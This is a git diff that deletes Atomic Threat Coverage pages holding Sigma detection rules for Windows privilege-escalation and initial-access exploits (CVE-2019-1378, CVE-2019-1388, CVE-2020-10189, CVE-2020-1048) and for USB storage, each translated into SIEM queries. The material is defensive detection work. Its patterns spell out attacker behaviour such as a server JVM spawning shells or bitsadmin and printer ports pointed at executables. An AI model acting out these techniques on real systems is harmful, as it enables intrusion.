-| Title                    | Exploiting SetupComplete.cmd CVE-2019-1378       |
-|:-------------------------|:------------------|
-| **Description**          | Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd decribed in CVE-2019-1378 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua](https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploiting SetupComplete.cmd CVE-2019-1378
-id: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5
-status: experimental
-description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd decribed in CVE-2019-1378 
-references:
-    - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
-author: Florian Roth
-date: 2019/11/15
-tags:
-  - attack.defense_evasion
-  - attack.privilege_escalation
-  - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentCommandLine: 
-            - '*\cmd.exe /c C:\Windows\Setup\Scripts\SetupComplete.cmd'
-            - '*\cmd.exe /c C:\Windows\Setup\Scripts\PartnerSetupComplete.cmd'
-    filter:
-        Image: 
-            - 'C:\Windows\System32\\*'
-            - 'C:\Windows\SysWOW64\\*'
-            - 'C:\Windows\WinSxS\\*'
-            - 'C:\Windows\Setup\\*'
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentCommandLine.*.*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\SetupComplete.cmd" -or $_.message -match "ParentCommandLine.*.*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd") -and  -not (($_.message -match "Image.*C:\\Windows\\System32\\.*" -or $_.message -match "Image.*C:\\Windows\\SysWOW64\\.*" -or $_.message -match "Image.*C:\\Windows\\WinSxS\\.*" -or $_.message -match "Image.*C:\\Windows\\Setup\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentCommandLine.keyword:(*\\cmd.exe\ \/c\ C\:\\Windows\\Setup\\Scripts\\SetupComplete.cmd OR *\\cmd.exe\ \/c\ C\:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd) AND (NOT (winlog.event_data.Image.keyword:(C\:\\Windows\\System32\\* OR C\:\\Windows\\SysWOW64\\* OR C\:\\Windows\\WinSxS\\* OR C\:\\Windows\\Setup\\*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1c373b6d-76ce-4553-997d-8c1da9a6b5f5 <<EOF
-{
-  "metadata": {
-    "title": "Exploiting SetupComplete.cmd CVE-2019-1378",
-    "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd decribed in CVE-2019-1378",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.t1055"
-    ],
-    "query": "(winlog.event_data.ParentCommandLine.keyword:(*\\\\cmd.exe\\ \\/c\\ C\\:\\\\Windows\\\\Setup\\\\Scripts\\\\SetupComplete.cmd OR *\\\\cmd.exe\\ \\/c\\ C\\:\\\\Windows\\\\Setup\\\\Scripts\\\\PartnerSetupComplete.cmd) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR C\\:\\\\Windows\\\\Setup\\\\*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentCommandLine.keyword:(*\\\\cmd.exe\\ \\/c\\ C\\:\\\\Windows\\\\Setup\\\\Scripts\\\\SetupComplete.cmd OR *\\\\cmd.exe\\ \\/c\\ C\\:\\\\Windows\\\\Setup\\\\Scripts\\\\PartnerSetupComplete.cmd) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR C\\:\\\\Windows\\\\Setup\\\\*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploiting SetupComplete.cmd CVE-2019-1378'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentCommandLine.keyword:(*\\cmd.exe \/c C\:\\Windows\\Setup\\Scripts\\SetupComplete.cmd *\\cmd.exe \/c C\:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd) AND (NOT (Image.keyword:(C\:\\Windows\\System32\\* C\:\\Windows\\SysWOW64\\* C\:\\Windows\\WinSxS\\* C\:\\Windows\\Setup\\*))))
-```
-
-
-### splunk
-    
-```
-((ParentCommandLine="*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\SetupComplete.cmd" OR ParentCommandLine="*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd") NOT ((Image="C:\\Windows\\System32\\*" OR Image="C:\\Windows\\SysWOW64\\*" OR Image="C:\\Windows\\WinSxS\\*" OR Image="C:\\Windows\\Setup\\*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentCommandLine IN ["*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\SetupComplete.cmd", "*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd"]  -(Image IN ["C:\\Windows\\System32\\*", "C:\\Windows\\SysWOW64\\*", "C:\\Windows\\WinSxS\\*", "C:\\Windows\\Setup\\*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\cmd\.exe /c C:\Windows\Setup\Scripts\SetupComplete\.cmd|.*.*\cmd\.exe /c C:\Windows\Setup\Scripts\PartnerSetupComplete\.cmd))(?=.*(?!.*(?:.*(?=.*(?:.*C:\Windows\System32\\.*|.*C:\Windows\SysWOW64\\.*|.*C:\Windows\WinSxS\\.*|.*C:\Windows\Setup\\.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1388.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1388.md
deleted file mode 100644
index add39e6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1388.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Exploiting CVE-2019-1388       |
-|:-------------------------|:------------------|
-| **Description**          | Detects an explotation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1068: Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388)</li><li>[https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege](https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploiting CVE-2019-1388
-id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
-status: experimental
-description: Detects an explotation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
-references:
-    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
-    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
-author: Florian Roth
-date: 2019/11/20
-tags:
-    - attack.privilege_escalation
-    - attack.t1068
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\consent.exe'
-        Image: '*\iexplore.exe'
-        CommandLine: '* http*'
-    rights1:
-        IntegrityLevel: 'System'  # for Sysmon users
-    rights2: 
-        User: 'NT AUTHORITY\SYSTEM'  # for non-Sysmon users - English language settings
-    condition: selection and ( rights1 or rights2 )
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\consent.exe" -and $_.message -match "Image.*.*\\iexplore.exe" -and $_.message -match "CommandLine.*.* http.*" -and ($_.ID -eq "1") -and ($_.message -match "IntegrityLevel.*System" -or $_.message -match "User.*NT AUTHORITY\\SYSTEM")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:*\\consent.exe AND winlog.event_data.Image.keyword:*\\iexplore.exe AND winlog.event_data.CommandLine.keyword:*\ http*) AND (IntegrityLevel:"System" OR winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/02e0b2ea-a597-428e-b04a-af6a1a403e5c <<EOF
-{
-  "metadata": {
-    "title": "Exploiting CVE-2019-1388",
-    "description": "Detects an explotation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1068"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:*\\\\consent.exe AND winlog.event_data.Image.keyword:*\\\\iexplore.exe AND winlog.event_data.CommandLine.keyword:*\\ http*) AND (IntegrityLevel:\"System\" OR winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:*\\\\consent.exe AND winlog.event_data.Image.keyword:*\\\\iexplore.exe AND winlog.event_data.CommandLine.keyword:*\\ http*) AND (IntegrityLevel:\"System\" OR winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploiting CVE-2019-1388'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:*\\consent.exe AND Image.keyword:*\\iexplore.exe AND CommandLine.keyword:* http*) AND (IntegrityLevel:"System" OR User:"NT AUTHORITY\\SYSTEM"))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\consent.exe" Image="*\\iexplore.exe" CommandLine="* http*") (IntegrityLevel="System" OR User="NT AUTHORITY\\SYSTEM"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\consent.exe" Image="*\\iexplore.exe" CommandLine="* http*" (IntegrityLevel="System" OR User="NT AUTHORITY\\SYSTEM"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\consent\.exe)(?=.*.*\iexplore\.exe)(?=.*.* http.*)))(?=.*(?:.*(?:.*System|.*NT AUTHORITY\SYSTEM))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
deleted file mode 100644
index a7a3930..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Exploited CVE-2020-10189 Zoho ManageEngine       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li><li>[https://nvd.nist.gov/vuln/detail/CVE-2020-10189](https://nvd.nist.gov/vuln/detail/CVE-2020-10189)</li><li>[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189)</li><li>[https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224](https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploited CVE-2020-10189 Zoho ManageEngine
-id: 846b866e-2a57-46ee-8e16-85fa92759be7
-status: experimental
-description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
-references:
-    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
-    - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
-author: Florian Roth
-date: 2020/03/25
-tags:
-    - attack.initial_access
-    - attack.t1190
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
-        Image|endswith: 
-            - '*\cmd.exe'
-            - '*\powershell.exe'
-            - '*\bitsadmin.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*DesktopCentral_Server\\jre\\bin\\java.exe" -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\bitsadmin.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*DesktopCentral_Server\\jre\\bin\\java.exe AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\bitsadmin.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/846b866e-2a57-46ee-8e16-85fa92759be7 <<EOF
-{
-  "metadata": {
-    "title": "Exploited CVE-2020-10189 Zoho ManageEngine",
-    "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",
-    "tags": [
-      "attack.initial_access",
-      "attack.t1190"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploited CVE-2020-10189 Zoho ManageEngine'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*DesktopCentral_Server\\jre\\bin\\java.exe AND Image.keyword:(*\\cmd.exe *\\powershell.exe *\\bitsadmin.exe))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*DesktopCentral_Server\\jre\\bin\\java.exe" (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\bitsadmin.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*DesktopCentral_Server\\jre\\bin\\java.exe" Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\bitsadmin.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*DesktopCentral_Server\jre\bin\java\.exe)(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\bitsadmin\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_1048.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_1048.md
deleted file mode 100644
index 9fca1bc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_1048.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Suspicious PrinterPorts Creation (CVE-2020-1048)       |
-|:-------------------------|:------------------|
-| **Description**          | Detects new commands that add new printer port which point to suspicious file |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>New printer port install on host</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://windows-internals.com/printdemon-cve-2020-1048/](https://windows-internals.com/printdemon-cve-2020-1048/)</li></ul>  |
-| **Author**               | EagleEye Team, Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PrinterPorts Creation (CVE-2020-1048)
-id: cc08d590-8b90-413a-aff6-31d1a99678d7
-status: experimental
-description: Detects new commands that add new printer port which point to suspicious file
-author: EagleEye Team, Florian Roth
-date: 2020/05/13
-modified: 2020/05/23
-references:
-    - https://windows-internals.com/printdemon-cve-2020-1048/
-tags:
-    - attack.persistence
-    - attack.execution
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains: 
-            - 'Add-PrinterPort -Name'
-    selection2:
-        CommandLine|contains: 
-            - '.exe'
-            - '.dll'
-            - '.bat'
-    selection3:
-        CommandLine|contains:
-            - 'Generic / Text Only'
-    condition: ( selection1 and selection2 ) or selection3
-falsepositives:
-    - New printer port install on host
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*Add-PrinterPort -Name.*") -and ($_.message -match "CommandLine.*.*.exe.*" -or $_.message -match "CommandLine.*.*.dll.*" -or $_.message -match "CommandLine.*.*.bat.*")) -or ($_.message -match "CommandLine.*.*Generic / Text Only.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:(*Add\-PrinterPort\ \-Name*) AND winlog.event_data.CommandLine.keyword:(*.exe* OR *.dll* OR *.bat*)) OR winlog.event_data.CommandLine.keyword:(*Generic\ \/\ Text\ Only*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cc08d590-8b90-413a-aff6-31d1a99678d7 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)",
-    "description": "Detects new commands that add new printer port which point to suspicious file",
-    "tags": [
-      "attack.persistence",
-      "attack.execution"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:(*Add\\-PrinterPort\\ \\-Name*) AND winlog.event_data.CommandLine.keyword:(*.exe* OR *.dll* OR *.bat*)) OR winlog.event_data.CommandLine.keyword:(*Generic\\ \\/\\ Text\\ Only*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:(*Add\\-PrinterPort\\ \\-Name*) AND winlog.event_data.CommandLine.keyword:(*.exe* OR *.dll* OR *.bat*)) OR winlog.event_data.CommandLine.keyword:(*Generic\\ \\/\\ Text\\ Only*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PrinterPorts Creation (CVE-2020-1048)'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:(*Add\-PrinterPort \-Name*) AND CommandLine.keyword:(*.exe* *.dll* *.bat*)) OR CommandLine.keyword:(*Generic \/ Text Only*))
-```
-
-
-### splunk
-    
-```
-(((CommandLine="*Add-PrinterPort -Name*") (CommandLine="*.exe*" OR CommandLine="*.dll*" OR CommandLine="*.bat*")) OR (CommandLine="*Generic / Text Only*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((event_id="1" CommandLine IN ["*Add-PrinterPort -Name*"] CommandLine IN ["*.exe*", "*.dll*", "*.bat*"]) OR CommandLine IN ["*Generic / Text Only*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*Add-PrinterPort -Name.*))(?=.*(?:.*.*\.exe.*|.*.*\.dll.*|.*.*\.bat.*)))|.*(?:.*.*Generic / Text Only.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_external_device.md b/Atomic_Threat_Coverage/Detection_Rules/win_external_device.md
deleted file mode 100644
index 0cb6121..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_external_device.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | External Disk Drive or USB Storage Device       |
-|:-------------------------|:------------------|
-| **Description**          | Detects external diskdrives or plugged in USB devices |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1091: Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)</li><li>[T1200: Hardware Additions](https://attack.mitre.org/techniques/T1200)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Keith Wright |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: External Disk Drive or USB Storage Device
-id: f69a87ea-955e-4fb4-adb2-bb9fd6685632
-description: Detects external diskdrives or plugged in USB devices
-status: experimental
-author: Keith Wright
-date: 2019/11/20
-tags:
-    - attack.t1091
-    - attack.t1200
-    - attack.lateral_movement
-    - attack.initial_access
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 
-            - 6416
-        DeviceClassName: 'DiskDrive'  
-    selection2:
-        DeviceDescription: 'USB Mass Storage Device'
-    condition: selection or selection2
-falsepositives: 
-    - Legitimate administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(((($_.ID -eq "6416") -and $_.message -match "DeviceClassName.*DiskDrive") -or $_.message -match "DeviceDescription.*USB Mass Storage Device")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:("6416") AND DeviceClassName:"DiskDrive") OR DeviceDescription:"USB\ Mass\ Storage\ Device"))
-```
-
-
-### xpack-watcher
-    
-```
